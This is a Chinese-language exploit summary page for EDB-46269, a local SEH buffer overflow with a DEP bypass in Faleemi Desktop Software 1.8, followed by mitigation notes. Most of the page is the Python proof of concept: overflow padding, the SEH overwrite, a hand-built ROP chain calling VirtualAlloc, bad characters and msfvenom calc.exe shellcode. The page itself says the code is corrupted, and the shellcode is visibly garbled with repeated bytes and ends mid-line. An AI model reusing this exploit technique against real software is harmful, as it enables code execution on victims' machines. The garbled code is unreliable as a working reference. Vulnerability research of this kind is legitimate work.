Faleemi Desktop Software 1.8 - 本地缓冲区溢出 (SEH) (DEP 绕过) 漏洞概述 EDB-ID: 46269 发布日期: 2019-01-28 作者: BZYO 类型: 本地 (LOCAL) 平台: Windows 漏洞描述: Faleemi Desktop Software 1.8 存在本地缓冲区溢出漏洞,攻击者可通过构造恶意输入触发 SEH(结构化异常处理)覆盖,并绕过 DEP(数据执行保护)实现任意代码执行。根据下方 PoC:溢出数据经约 264 字节填充后覆盖 SEH 记录;DEP 绕过由一条手工构造(基于 mona.py 的 rop.txt / ropfunc.txt 输出)、调用 VirtualAlloc() 的 ROP 链完成,最终执行 msfvenom 生成的 windows/exec 载荷(启动 calc.exe);坏字符为 \x00\x0a\x0d\x2f。该 PoC 在 EDB-45402 的原始 SEH PoC 基础上扩展而来。 影响范围 受影响软件: Faleemi Desktop Software 1.8 操作系统: Windows 利用方式: 本地利用(需用户交互或本地执行) 修复方案 官方未提供明确补丁信息。 建议升级至最新版本或联系厂商获取安全更新。 临时缓解措施:注意"禁用宏"与本漏洞无关——这是桌面程序自身的原生缓冲区溢出,并非 Office 宏问题;可行的缓解包括:不要用该软件处理来源不可信的输入、限制该程序的执行权限/以低权限账户运行、部署 EDR 防护。此外,PoC 的 ROP 链全部使用硬编码的 gadget 地址(即依赖未随机化加载基址的模块),因此通过 Windows Exploit Protection 对该进程强制启用 ASLR(Mandatory ASLR)可使这条特定 ROP 链失效;但这只是提高利用难度,并不修复溢出本身。 POC / 利用代码 注意:下方 PoC 在页面转换中已损坏——换行丢失、字符串重复运算符 `*` 丢失(如 `"A" 264` 应为 `"A" * 264`)、看起来 `rop` 的初始化及部分 `#` 注释标记也缺失、末尾 shellcode 被截断——不能直接运行,请以 EDB-46269 原文为准。 ```python #!/usr/bin/bin/python Exploit Author: bzyo Twitter: @bzyo_ Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) Date: 01-26-19 Vulnerable Software: Faleemi Desktop Software 1.8 manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds practicing dep bypass by not using auto-generated mona.py ropchains original seh poc from Clonathan "John" Reale, EDB: 45402 badchars: \x00\x0a\x0d\x2f import struct filename = "faleemidep.txt" junk = "A" 264 #0x0004e7e ADD ESP,0B34 POP EBX POP EBP POP ESI POP EDI RETN seh = "\x7e\x04\x00\x00" fill = "C" 324 #VirtualAlloc() #EDI = ROP NOP (RETN) rop += struct.pack('<L', 0x60010221) POP EDI RETN rop += struct.pack('<L', 0x60010222) ROP-NOP #ECX = flProtect (0x40) rop += struct.pack('<L', 0x0004e7e1) POP ECX RETN rop += struct.pack('<L', 0xffffffff) MOV EAX,DWORD PTR [ESI+ECX] RETN for i in range(0,65): rop += struct.pack('<L', 0x6004bcc7) INC ECX RETN #ESI = ptr to VirtualAlloc() rop += struct.pack('<L', 0x6004aaca) POP EAX RETN rop += struct.pack('<L', 0x6004f0bc) ptr to VirtualAlloc() rop += struct.pack('<L', 0x60080b96) MOV EAX,DWORD PTR [ESI+ECX] RETN rop += struct.pack('<L', 0x73d03c02) XCHG EAX,ESI RETN #EDX = flAllocationType (0x1000) Math 1fffffffff - 0cc40360 = ff33b7c97 Math 2)ff33b7c97 + 10001 = ff33b8c98 rop += struct.pack('<L', 0x60832d5) MOV EDX,ECX40360 RETN rop += struct.pack('<L', 0x60036b0) POP EBX RETN rop += struct.pack('<L', 0xff33bc98) rop += struct.pack('<L', 0x6004e5ce) ADD EDX,EBX POP EDX RETN 0x10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and 
RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L', 0x60010222) ROP-NOP #compensate for POP and RETN 10 #EBP = ReturnTo (ptr to jmp esp) #mona jmp - esp -cpb "\x00\x0a\x0d\x2f" rop += struct.pack('<L', 0x600301e9) POP EBP RETN rop += struct.pack('<L', 0x73d04206) jmp esp #EBX = dwSize (0x1) rop += struct.pack('<L', 0x73d0febc) POP EBX RETN rop += struct.pack('<L', 0xffffffff) rop += struct.pack('<L', 0x73d0be1c) INC EDX XOR EAX,EAX RETN rop += struct.pack('<L', 0x73d0be1c) INC EBX XOR EAX,EAX RETN #EAX = NOP (0x90909090) rop += struct.pack('<L', 0x6004aaca) POP EAX RETN rop += struct.pack('<L', 0x90909090) NOPs. #PUSHAD rop += struct.pack('<L', 0x6004bd05) PUSHAD RETN nops = "\x90"*10 #msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d\x2f" -f python calc = "" calc += "\x8d\x91\xf7\xbd\x8d\x9c\xa2\xba\xfa\x34\x8d\x91\x74\x24\xfa\x4d\x3b\x29" calc += "\xc9\x91\xa1\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x4f\x7c\x81\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x9c\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x71\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x81\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += 
"\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" calc += "\x8d\x91\x31\x31\x31\x